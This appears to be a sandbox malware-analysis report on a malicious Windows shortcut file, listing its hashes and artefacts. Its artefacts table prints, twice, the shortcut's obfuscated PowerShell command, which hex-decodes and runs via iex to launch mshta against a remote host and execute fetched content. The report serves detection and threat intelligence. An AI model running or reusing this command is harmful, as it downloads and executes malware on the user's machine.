Malicious
652410e0a0fddd37a74b38401edba3ba
LNK File | MD5: 652410e0a0fddd37a74b38401edba3ba | Size: 3.07 KB | application/x-ms-shortcut
LNK File
MD5: 652410e0a0fddd37a74b38401edba3ba
Size: 3.07 KB
application/x-ms-shortcut
Infection Chain
Summary by MalvaGPT
Characteristics
|
Hash | Hash Value |
|---|---|
| MD5 | 652410e0a0fddd37a74b38401edba3ba
|
| Sha1 | b20244ca32d618b1d9aa982d16d324c87ef20885
|
| Sha256 | bde0e50a1fd4041b47d8568091bd0a25a038b771e690f991187b2cce42307c21
|
| Sha384 | 4c8c80715610286d4d8b809ced562205c95db03e1beb5d8700f29a25e648c979c4211d9fabfc34c53c073c678576199d
|
| Sha512 | 11c3f3edda824a11484f93d555e6fdbea659d5bf21e1f2818320cc92117e0136507f4c24d232fb48f224341f12626da58f34543cd0168e381182a1655b79cf86
|
| SSDeep | 24:8Ayw/BHYVKVWf+/CWNAZK3YbyZNgER0H0ozAudd79dsrabxJlpl9l:8y5aCAZKIUqHjUudJ9AadrL9
|
| TLSH | D951C13D5AE61329E2B6DB7298BA6212F837BD42F9308E4D10CE43441727615B4D4F2F
|
File Structure
652410e0a0fddd37a74b38401edba3ba
Malicious
[Lnk Summary]
Malicious
Artefacts
|
Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe [Text.Encoding]::UTF8.GetString((('26284765742d48656c7020693f78292e4e616d6520272628676920433a5c572a735c532a325c6d73682a65292068747470733a2f2f7570646174652d686f73742d6f6e652e746f702f4972657566684766332f746573744d532e6d703427' -split '(..)'|?{$_})|%{[Convert]::ToByte($_,16)}))|iex |
652410e0a0fddd37a74b38401edba3ba (3.07 KB)
File Structure
652410e0a0fddd37a74b38401edba3ba
Malicious
[Lnk Summary]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe [Text.Encoding]::UTF8.GetString((('26284765742d48656c7020693f78292e4e616d6520272628676920433a5c572a735c532a325c6d73682a65292068747470733a2f2f7570646174652d686f73742d6f6e652e746f702f4972657566684766332f746573744d532e6d703427' -split '(..)'|?{$_})|%{[Convert]::ToByte($_,16)}))|iex Malicious |
652410e0a0fddd37a74b38401edba3ba |
You must be signed in to post a comment.
You need a premium account to access this feature.
You must be signed in to post a comment.